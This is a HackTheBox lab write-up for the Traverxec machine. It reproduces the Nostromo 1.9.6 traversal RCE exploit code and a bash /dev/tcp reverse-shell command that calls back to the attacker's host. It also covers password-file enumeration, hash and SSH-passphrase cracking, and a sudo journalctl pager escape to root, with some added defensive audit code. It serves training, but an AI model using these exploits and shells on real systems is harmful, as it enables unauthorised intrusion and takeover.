HackTheBox — Traverxec Writeup

This is my first write-up for a HackTheBox machine: Traverxec.
Let's start by scanning it. I have a ready-made script that first sweeps all 65535 ports, then runs service/version detection and the default nmap scripts against only the ports it found open.
Here is the scanning bash script:
#!/bin/bash
# usage: portScanner.sh <target> [extra nmap args...]
target="$1"; shift
echo "Grabbing ports..."
# fast full-range sweep; keep only the port numbers and join them with commas
ports=$(nmap -p- --min-rate 1000 -v -T4 "$target" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
echo "Ports grabbed: $ports"
echo "Scanning..."
# default scripts + version detection, restricted to the open ports
nmap -sC -v -sV -Pn -p "$ports" "$target" "$@"
Now I run it against the target:
portScanner.sh traverxec.htb
Let's check the scan results:

I found only two open ports:
- SSH (22/tcp)
- Web (80/tcp): the Nostromo web server, version 1.9.6.
The first thing that came to mind was to search for known exploits for it, using searchsploit:
searchsploit "nostromo 1.9.6"

Luck was on my side: the first hit is a Remote Code Execution exploit.
Let's copy it to the current directory and use it.
cp /usr/share/exploitdb/exploits/multiple/remote/47837.py Exploit.py
I copied it and named it Exploit.py.
Reading the exploit, I found that Nostromo nhttpd through version 1.9.6 is affected by a directory traversal in the function http_verify, which allows remote code execution via a crafted HTTP request.
Now let's see what the Python exploit needs in order to run.
It contains the following function:
import socket

def connect(soc):
    # helper from the exploit: read until the server closes the connection
    data = b''
    while chunk := soc.recv(1024):
        data += chunk
    return data.decode(errors='replace')

def cve(target, port, cmd):
    soc = socket.socket()
    soc.connect((target, int(port)))
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload.encode())  # send bytes so it also runs under Python 3
    receive = connect(soc)
    print(receive)
It sends a crafted POST request whose path uses four ".%0d./" segments to traverse out of the document root to /bin/sh, passes the cmd argument in the request body so that sh executes it on the server, then reads the response and prints it.
I ran the script to show its help:

So it only needs the target IP, the target port and the command to run:
python Exploit.py 10.10.10.165 80 whoami

Now I will get a reverse shell back to my machine; thanks to Pentestmonkey for the cheat sheet.
First I create a netcat listener on port 8090:
nc -nvlp 8090
and in another terminal I run the exploit again with the reverse-shell one-liner as the command:
python Exploit.py 10.10.10.165 80 "bash -i >& /dev/tcp/10.10.16.40/8090 0>&1"
Now I have a reverse shell.

Now let's list the users on the system:
cat /etc/passwd
Now let's keep only the users whose login shell is bash:
grep "/bin/bash" /etc/passwd
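Grepping for /bin/bash is quick but misses accounts whose shell is /bin/sh, /bin/zsh or anything else interactive, and it says nothing about a second uid-0 account. The following parser, an added example that is not from the original write-up, does the same enumeration on a constructed passwd-format sample (not the target's real file) and returns the interesting accounts in three ways.

```python
# Constructed sample in /etc/passwd format (not the target's real file).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
david:x:1000:1000:david,,,:/home/david:/bin/bash
backup-op:x:1001:1001::/home/backup-op:/bin/sh
toor:x:0:0::/root:/bin/zsh
"""

# Shells that cannot be used for an interactive login.
NON_LOGIN_SHELLS = {'/usr/sbin/nologin', '/sbin/nologin', '/bin/false', '/bin/sync', ''}


def parse_passwd(text):
    """Yield (name, uid, gid, home, shell) for every well-formed line."""
    for line in text.splitlines():
        if not line or line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) != 7:
            continue  # skip malformed lines instead of crashing mid-enumeration
        name, _pw, uid, gid, _gecos, home, shell = fields
        yield name, int(uid), int(gid), home, shell


def login_users(text):
    """Accounts that can log in interactively, whatever their shell is."""
    return [u[0] for u in parse_passwd(text) if u[4] not in NON_LOGIN_SHELLS]


def uid0_accounts(text):
    """Every account with uid 0; a second root-equivalent user is worth a closer look."""
    return [u[0] for u in parse_passwd(text) if u[1] == 0]


def grep_bash(text):
    """What the grep '/bin/bash' pipeline above returns, for comparison."""
    return [u[0] for u in parse_passwd(text) if '/bin/bash' in u[4]]
```

On the sample, the grep view returns only root and david, while the shell-aware view also finds the /bin/sh and /bin/zsh accounts.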

Now let's upgrade to a proper TTY shell:
python -c 'import pty; pty.spawn("/bin/sh")'

Now I will upload the LinEnum script to the target for further enumeration.
I had already downloaded it and put it on my web server, so on the target I just go to /tmp, where I found I have write permission, and fetch it there.

Let's make the script executable so we can run it:

I ran the script:
./LinEnum.sh
The most interesting finding is a hashed password in an htpasswd file:

I copied the hash into a file called hash.txt, then used John the Ripper with the rockyou wordlist to recover the clear-text password:
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

I tried to log in over SSH with david's credentials, but it did not work, so I decided to look for other Nostromo configuration files that might hold further clues.

I found an accessible directory called public_www inside the home directory that Nostromo serves, since its owner is the server admin.

I extracted backup-ssh-identity-files.tgz into /tmp.

Now let's crack the passphrase of the SSH key with John (the key first has to be converted to John's format with ssh2john):


Now let's change the permissions of the SSH key id_rsa to 600, so that nobody but its owner can read it (ssh refuses to use a private key that is readable by group or others), then log in to the target with it, supplying the cracked passphrase hunter:
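The check ssh performs is on the group/other bits: any of them set and the key is rejected with "Permissions 0644 for 'id_rsa' are too open" and ignored. The following helper, an added example that is not from the original write-up, reproduces that check and the chmod 600 fix on a placeholder key file written to a temporary directory (constructed, not a real key).

```python
import os
import stat
import tempfile


def key_mode_ok(path):
    """True if the private key is readable only by its owner.
    OpenSSH refuses a key with any group/other bits set, which is the 0o077 mask here."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return mode & 0o077 == 0


def fix_key_mode(path):
    """Equivalent of `chmod 600 id_rsa`; returns the resulting mode."""
    os.chmod(path, 0o600)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Write a placeholder key, show the check failing at 644 and passing after the fix.
    Returns (ok_before, ok_after, final_mode)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, 'id_rsa')
        with open(path, 'w') as f:
            # placeholder contents, not a real key
            f.write('-----BEGIN OPENSSH PRIVATE KEY-----\n(placeholder)\n-----END OPENSSH PRIVATE KEY-----\n')
        os.chmod(path, 0o644)  # what an archive extracted as a normal user often gives you
        before = key_mode_ok(path)
        final_mode = fix_key_mode(path)
        after = key_mode_ok(path)
        return before, after, final_mode
```

The same mask explains why a key copied to a shared /tmp and left world-readable is also readable by every other local user, which is the second reason to fix the mode before use.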


I explored the bin directory and found the following:

I searched for journalctl as a privilege-escalation vector, because the script in that directory runs it with sudo.
The day was mine: the first Google result, GTFOBins, says journalctl can be used to break out of restricted environments by spawning an interactive shell. After some more searching I realised that, after running the command, I have to shrink the terminal window: journalctl pipes its output through the less pager when it does not fit on screen, and from less the GTFOBins trick of typing !/bin/sh gives a shell as root, since the sudo rule runs the command as root.
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
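The lesson for the defender side is that fixing the arguments in the sudo rule does not help when the binary itself hands you a pager or editor. The following sudoers audit, an added example that is not from the original write-up, parses a constructed sudoers-format sample (not the target's real file; the set of flagged binaries is my own selection from what GTFOBins documents) and reports the rules that are exploitable this way.

```python
import re
import shlex

# Binaries whose sudo entry GTFOBins lists as able to spawn a shell through a pager or editor
# (journalctl and systemctl hand output to less; `!/bin/sh` inside less then runs as the sudo target user).
PAGER_OR_EDITOR = {'journalctl', 'systemctl', 'less', 'more', 'man', 'vi', 'vim', 'nano', 'git'}

# Constructed sample in sudoers format (not the target's real file).
SAMPLE_SUDOERS = """\
# /etc/sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
david   ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
ops     ALL=(ALL) NOPASSWD: /usr/bin/systemctl status nginx, /usr/bin/apt update
www-data ALL=(root) NOPASSWD: /usr/bin/id
"""

# user  host=(runas) [NOPASSWD:] command[, command...]
RULE = re.compile(r'^(\S+)\s+(\S+)=\((.+?)\)\s*(NOPASSWD:\s*)?(.+)$')


def parse_sudoers(text):
    """Yield (user, runas, nopasswd, command) once per command, splitting comma-separated lists."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#') or line.startswith('Defaults'):
            continue
        m = RULE.match(line)
        if not m:
            continue  # aliases and other syntax are out of scope for this check
        user, _host, runas, nopasswd, cmds = m.groups()
        for cmd in cmds.split(','):
            yield user, runas, bool(nopasswd), cmd.strip()


def escalation_candidates(text):
    """Rules whose command is a pager/editor-capable binary. The fixed argument list does not
    save the rule: the breakout happens inside the pager, not through the arguments."""
    hits = []
    for user, runas, nopasswd, cmd in parse_sudoers(text):
        if cmd == 'ALL':
            continue  # full sudo is a finding of its own, not a pager trick
        binary = shlex.split(cmd)[0].rsplit('/', 1)[-1]
        if binary in PAGER_OR_EDITOR:
            hits.append((user, runas, nopasswd, cmd))
    return hits
```

Running it on the sample flags the journalctl rule and the systemctl status rule but not /usr/bin/id or apt; a rule like `journalctl --no-pager ...` would still be flagged by this simple basename match, so treat a hit as something to verify by hand.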
